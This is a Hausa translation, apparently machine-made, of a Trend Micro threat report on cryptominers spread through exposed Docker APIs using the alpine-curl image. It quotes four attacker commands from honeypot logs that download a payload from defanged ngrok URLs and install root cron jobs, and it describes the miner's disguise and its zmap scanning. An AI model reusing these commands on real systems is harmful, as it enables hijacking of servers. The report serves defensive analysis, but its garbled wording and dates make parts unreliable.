Mun yi nazarin bayanan da aka tattara ta amfani da kwantena na tukunyar zuma, waɗanda muka ƙirƙira don gano barazanar. Kuma mun gano gagarumin ayyuka daga maras so ko mara izini masu hakar ma'adinan cryptocurrency da aka tura azaman kwantena masu damfara ta amfani da hoton da aka buga a kan Docker Hub. Ana amfani da hoton azaman wani ɓangare na sabis ɗin da ke sadar da masu hakar ma'adinan cryptocurrency ƙeta.
Bugu da ƙari, ana shigar da shirye-shiryen aiki tare da cibiyoyin sadarwa don kutsawa buɗaɗɗen kwantena da aikace-aikace maƙwabta.
Muna barin wuraren ajiyar zuma kamar yadda yake, wato, tare da saitunan tsoho, ba tare da wani matakan tsaro ko shigar da ƙarin software ba. Lura cewa Docker yana da shawarwari don saitin farko don guje wa kurakurai da lahani masu sauƙi. Amma tukwanen zumar da ake amfani da su kwantena ne, an tsara su don gano hare-haren da ake kaiwa dandali, ba aikace-aikacen da ke cikin kwantena ba.
Ayyukan mugunta da aka gano shima sananne ne saboda baya buƙatar lahani kuma ya kasance mai zaman kansa daga sigar Docker. Gano abin da ba daidai ba, don haka buɗe, hoton kwantena shine kawai abin da maharan ke buƙatar cutar da yawancin buɗaɗɗen sabar.
API ɗin Docker da ba a rufe yana ba mai amfani damar yin kewayon kewayon , ciki har da samun jerin kwantena masu gudana, samun rajistan ayyukan daga takamaiman akwati, farawa, tsayawa (ciki har da tilastawa) har ma da ƙirƙirar sabon akwati daga takamaiman hoto tare da ƙayyadaddun saitunan.
A gefen hagu shine hanyar isar da malware. A hannun dama shine mahallin maharin, wanda ke ba da damar fitar da hotuna daga nesa.
Rarraba ta ƙasar 3762 buɗaɗɗen Docker APIs. Dangane da neman Shodan ranar 12.02.2019/XNUMX/XNUMX
Sarkar kai hari da zaɓuɓɓukan kaya
An gano ayyukan mugunta ba kawai tare da taimakon saƙar zuma ba. Bayanai daga Shodan sun nuna cewa adadin fallasa Docker APIs (duba jadawali na biyu) ya ƙaru tun lokacin da muka bincika wani akwati da ba a tsara shi ba da aka yi amfani da shi azaman gada don tura software na ma'adinan cryptocurrency Monero. A watan Oktobar bara (2018, bayanan yanzu kusan mai fassara) akwai APIs 856 da aka buɗe kawai.
Wani bincike da aka yi a cikin gungumen ajiyar zumar ya nuna cewa amfani da hoton kwantena kuma yana da alaƙa da amfani da , kayan aiki don kafa amintattun hanyoyin haɗin gwiwa ko isar da zirga-zirga daga wuraren samun damar jama'a zuwa takamaiman adireshi ko albarkatu (misali localhost). Wannan yana bawa maharan damar ƙirƙirar URLs a hankali yayin isar da kaya zuwa buɗaɗɗen sabar. A ƙasa akwai misalan lambobi daga rajistan ayyukan da ke nuna cin zarafin sabis ɗin ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Kamar yadda kuke gani, ana sauke fayilolin da aka ɗora daga URLs masu canzawa koyaushe. Waɗannan URLs suna da ɗan gajeren kwanan ranar karewa, don haka ba za a iya sauke kayan biya ba bayan ranar karewa.
Akwai zaɓuɓɓukan kaya biyu. Na farko shine mai hakar ma'adinan ELF da aka haɗa don Linux (wanda aka bayyana azaman Coinminer.SH.MALXMR.ATNO) wanda ke haɗawa zuwa tafkin ma'adinai. Na biyu shi ne rubutun (TrojanSpy.SH.ZNETMAP.A) wanda aka ƙera don samun wasu kayan aikin cibiyar sadarwa da ake amfani da su don bincika kewayon cibiyar sadarwa sannan a nemo sabbin hari.
Rubutun dropper yana saita masu canji guda biyu, waɗanda ake amfani da su don tura ma'adinan cryptocurrency. Maɓallin HOST ya ƙunshi URL inda fayilolin ƙeta suke, kuma madaidaicin RIP shine sunan fayil (a zahiri, hash) na mai hakar ma'adinai da za a tura. Maɓallin HOST yana canzawa duk lokacin da m hash ya canza. Rubutun kuma yana ƙoƙarin bincika cewa babu wasu masu hakar cryptocurrency da ke gudana akan sabar da aka kai hari.
Misalai na HOST da RIP, da kuma snippet code da aka yi amfani da su don bincika cewa babu sauran masu hakar ma'adinai da ke gudana.
Kafin fara mai hakar ma'adinai, an sake masa suna zuwa nginx. Sauran nau'ikan wannan rubutun suna sake suna mai hakar ma'adinai zuwa wasu halaltattun ayyuka waɗanda ƙila su kasance a cikin mahallin Linux. Wannan yawanci ya isa ketare cak a kan jerin hanyoyin tafiyarwa.
Rubutun bincike kuma yana da fasali. Yana aiki tare da sabis na URL iri ɗaya don tura kayan aikin da suka dace. Daga cikin su akwai binary na zmap, wanda ake amfani da shi don bincika hanyoyin sadarwa da samun jerin wuraren buɗe ido. Rubutun kuma yana ɗaukar wani binary wanda ake amfani da shi don hulɗa tare da ayyukan da aka samo da karɓar banners daga gare su don ƙayyade ƙarin bayani game da sabis ɗin da aka samo (misali, sigar sa).
Rubutun kuma ya riga ya ƙayyade wasu jeri na cibiyar sadarwa don dubawa, amma wannan ya dogara da sigar rubutun. Hakanan yana saita tashar jiragen ruwa da aka niyya daga ayyukan-a wannan yanayin, Docker-kafin gudanar da sikanin.
Da zaran an sami maƙasudai, ana cire banners daga gare su ta atomatik. Rubutun kuma yana tace maƙasudi dangane da ayyuka, aikace-aikace, abubuwan haɗin gwiwa ko dandamali na ban sha'awa: Redis, Jenkins, Drupal, MODX, , Docker 1.16 abokin ciniki da Apache CouchDB. Idan uwar garken da aka bincika ya dace da ɗayansu, ana adana ta a cikin fayil ɗin rubutu, wanda maharan za su iya amfani da su daga baya don bincike da kutse. Ana ɗora waɗannan fayilolin rubutu zuwa sabar maharan ta hanyoyin haɗin gwiwa masu ƙarfi. Wato, ana amfani da URL daban don kowane fayil, wanda ke nufin samun damar gaba yana da wahala.
Harerin harin hoton Docker ne, kamar yadda ake iya gani a cikin lambobi guda biyu masu zuwa.
A saman ana canza suna zuwa sabis na halal, kuma a ƙasa shine yadda ake amfani da zmap don bincika hanyoyin sadarwa.
A saman akwai kewayon cibiyar sadarwa da aka riga aka ƙayyade, a ƙasa akwai takamaiman tashar jiragen ruwa don neman ayyuka, gami da Docker.
Hoton hoton ya nuna cewa an sauke hoton alpine-curl fiye da sau miliyan 10
Dangane da Alpine Linux da curl, kayan aikin CLI mai inganci don canja wurin fayiloli akan ka'idoji daban-daban, zaku iya ginawa. . Kamar yadda kuke gani a hoton da ya gabata, an riga an sauke wannan hoton fiye da sau miliyan 10. Yawancin abubuwan zazzagewa na iya nufin amfani da wannan hoton azaman wurin shiga; an sabunta wannan hoton fiye da watanni shida da suka gabata; masu amfani ba su sauke wasu hotuna daga wannan ma'ajiyar sau da yawa. In Docker - saitin umarnin da aka yi amfani da shi don saita akwati don gudanar da shi. Idan saitunan wurin shigarwa ba daidai ba ne (misali, an bar akwati a buɗe daga Intanet), ana iya amfani da hoton azaman harin kai hari. Maharan za su iya amfani da shi don isar da kaya idan sun sami ɓataccen tsari ko buɗaɗɗen akwati da aka bar baya da tallafi.
Yana da mahimmanci a lura cewa wannan hoton (alpine-curl) kanta ba ta da lahani, amma kamar yadda kake gani a sama, ana iya amfani da shi don yin ayyuka masu banƙyama. Hakanan ana iya amfani da irin waɗannan hotunan Docker don aiwatar da munanan ayyuka. Mun tuntubi Docker kuma mun yi aiki tare da su kan wannan batu.
shawarwari
saura ga kamfanoni da yawa, musamman masu aiwatarwa , mayar da hankali kan saurin ci gaba da bayarwa. Komai yana kara tsanantawa da buƙatar bin ka'idodin dubawa da sa ido, buƙatar saka idanu kan sirrin bayanai, da kuma babban lalacewa daga rashin bin su. Haɗa aikin tsaro ta atomatik a cikin ci gaban rayuwa ba wai kawai yana taimaka muku nemo ramukan tsaro waɗanda za su iya wucewa ba tare da an gano su ba, amma kuma yana taimaka muku rage yawan aikin da ba dole ba, kamar gudanar da ƙarin kayan aikin software don kowane lahani da aka gano ko rashin tsari bayan an tura aikace-aikacen.
Lamarin da aka tattauna a wannan labarin ya nuna bukatar yin la’akari da aminci tun daga farko, gami da shawarwari masu zuwa:
- Don masu gudanar da tsarin da masu haɓakawa: Koyaushe bincika saitunan API ɗinku don tabbatar da an saita komai don karɓar buƙatun kawai daga takamaiman sabar ko cibiyar sadarwa ta ciki.
- Bi ƙa'idar mafi ƙanƙanta haƙƙoƙi: tabbatar da cewa an sanya hannu kuma an tabbatar da hotunan kwantena, iyakance samun dama ga abubuwan da suka shafi mahimmanci (sabis na ƙaddamar da kwantena) da ƙara ɓoyewa zuwa haɗin yanar gizo.
- Bi da ba da damar hanyoyin tsaro, misali. kuma ginannen .
- Yi amfani da na'urar daukar hoto ta atomatik na lokutan gudu da hotuna don samun ƙarin bayani game da hanyoyin da ke gudana a cikin akwati (misali, don gano ɓarna ko bincika lahani). Ikon aikace-aikacen da saka idanu na gaskiya suna taimakawa bin sauye-sauye marasa daidaituwa ga sabobin, fayiloli, da wuraren tsarin.
Trendmicro yana taimaka wa ƙungiyoyin DevOps su gina cikin aminci, fitar da sauri, da ƙaddamar da ko'ina. Trend Micro Yana ba da tsaro mai ƙarfi, daidaitacce, da sarrafa kansa a cikin bututun ƙungiyar DevOps kuma yana ba da kariya ta barazana da yawa. don kare aikin jiki, kama-da-wane da gajimare a lokacin aiki. Hakanan yana ƙara tsaro na kwantena tare da и , wanda ke bincika hotunan akwati na Docker don malware da lahani a kowane lokaci a cikin bututun haɓaka don hana barazanar kafin a tura su.
Alamomin sulhu
Hashes masu alaƙa:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
a kan Masu iya magana suna nuna irin saitunan da ake buƙatar farawa da farko don rage yiwuwar ko kuma kauce wa faruwar yanayin da aka bayyana a sama gaba ɗaya. Kuma a kan Agusta 19-21 a wani m online Kuna iya tattauna waɗannan matsalolin tsaro da makamantansu tare da abokan aiki da ƙwararrun malamai a teburin zagaye, inda kowa zai iya yin magana da sauraron raɗaɗi da nasarorin abokan aiki.
source: www.habr.com